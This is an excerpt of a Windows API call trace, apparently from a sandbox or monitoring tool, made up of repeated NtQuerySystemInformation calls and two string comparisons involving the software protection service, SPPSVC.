[0228.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee20, Length=0x28, ResultLength=0x0) [0228.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x38, ResultLength=0x0) [0228.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x20, ResultLength=0x0) [0228.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed00, Length=0x20, ResultLength=0x0) [0228.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed00, Length=0x20, ResultLength=0x0) [0228.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed00, Length=0x20, ResultLength=0x0) [0228.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x38, ResultLength=0x0) [0228.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x20, ResultLength=0x0) [0228.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed10, Length=0x20, ResultLength=0x0) [0228.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed10, Length=0x20, ResultLength=0x0) [0228.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff220, Length=0x40, ResultLength=0x0) [0228.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x50, ResultLength=0x0) [0228.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed00, Length=0x28, ResultLength=0x0) [0228.530] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0228.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x50, ResultLength=0x0) [0228.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x50, ResultLength=0x0) [0228.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x50, ResultLength=0x0) [0228.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x38, ResultLength=0x0) [0228.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feae0, Length=0x28, ResultLength=0x0) [0228.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feae0, Length=0x28, ResultLength=0x0) [0228.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feae0, Length=0x28, ResultLength=0x0) [0228.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb50, Length=0x28, ResultLength=0x0) [0228.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x38, ResultLength=0x0) [0228.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febd0, Length=0x28, ResultLength=0x0) [0228.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febd0, Length=0x28, ResultLength=0x0) [0228.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x38, ResultLength=0x0) [0228.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb30, Length=0x20, ResultLength=0x0) [0228.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feab0, Length=0x20, ResultLength=0x0) [0228.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feab0, Length=0x20, ResultLength=0x0) [0228.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feab0, Length=0x20, ResultLength=0x0) [0228.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x38, ResultLength=0x0) [0228.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb30, Length=0x20, ResultLength=0x0) [0228.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feac0, Length=0x20, ResultLength=0x0) [0228.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feac0, Length=0x20, ResultLength=0x0) [0228.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x50, ResultLength=0x0) [0228.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed00, Length=0x28, ResultLength=0x0) [0228.543] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0228.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x50, ResultLength=0x0) [0228.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x50, ResultLength=0x0) [0228.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x50, ResultLength=0x0) [0228.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x38, ResultLength=0x0) [0228.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feae0, Length=0x28, ResultLength=0x0) [0228.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feae0, Length=0x28, ResultLength=0x0) [0228.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feae0, Length=0x28, ResultLength=0x0) [0228.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb50, Length=0x28, ResultLength=0x0) [0228.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x38, ResultLength=0x0) [0228.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febd0, Length=0x28, ResultLength=0x0) [0228.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febd0, Length=0x28, ResultLength=0x0) [0228.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x38, ResultLength=0x0) [0228.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb30, Length=0x20, ResultLength=0x0) [0228.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feab0, Length=0x20, ResultLength=0x0) [0228.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feab0, Length=0x20, ResultLength=0x0) [0228.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feab0, Length=0x20, ResultLength=0x0) [0228.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x38, ResultLength=0x0) [0228.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb30, Length=0x20, ResultLength=0x0) [0228.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feac0, Length=0x20, ResultLength=0x0) [0228.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feac0, Length=0x20, ResultLength=0x0) [0228.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2c0, Length=0x20, ResultLength=0x0) [0228.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff040, Length=0x50, ResultLength=0x0) [0228.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff040, Length=0x50, ResultLength=0x0) [0228.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff040, Length=0x50, ResultLength=0x0) [0228.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef30, Length=0x50, ResultLength=0x0) [0228.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef30, Length=0x50, ResultLength=0x0) [0228.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef30, Length=0x50, ResultLength=0x0) [0228.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef30, Length=0x50, ResultLength=0x0) [0228.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x38, ResultLength=0x0) [0228.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec90, Length=0x28, ResultLength=0x0) [0228.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec90, Length=0x28, ResultLength=0x0) [0228.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec90, Length=0x28, ResultLength=0x0) [0228.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed00, Length=0x28, ResultLength=0x0) [0228.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x38, ResultLength=0x0) [0228.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x28, ResultLength=0x0) [0228.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x28, ResultLength=0x0) [0228.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x38, ResultLength=0x0) [0228.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fece0, Length=0x20, ResultLength=0x0) [0228.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec60, Length=0x20, ResultLength=0x0) [0228.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec60, Length=0x20, ResultLength=0x0) [0228.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec60, Length=0x20, ResultLength=0x0) [0228.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x38, ResultLength=0x0) [0228.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fece0, Length=0x20, ResultLength=0x0) [0228.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0228.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0228.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff040, Length=0x50, ResultLength=0x0) [0228.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff040, Length=0x50, ResultLength=0x0) [0228.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff040, Length=0x50, ResultLength=0x0) [0228.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef30, Length=0x50, ResultLength=0x0) [0228.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef30, Length=0x50, ResultLength=0x0) [0228.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef30, Length=0x50, ResultLength=0x0) [0228.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef30, Length=0x50, ResultLength=0x0) [0228.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x38, ResultLength=0x0) [0228.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec90, Length=0x28, ResultLength=0x0) [0228.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 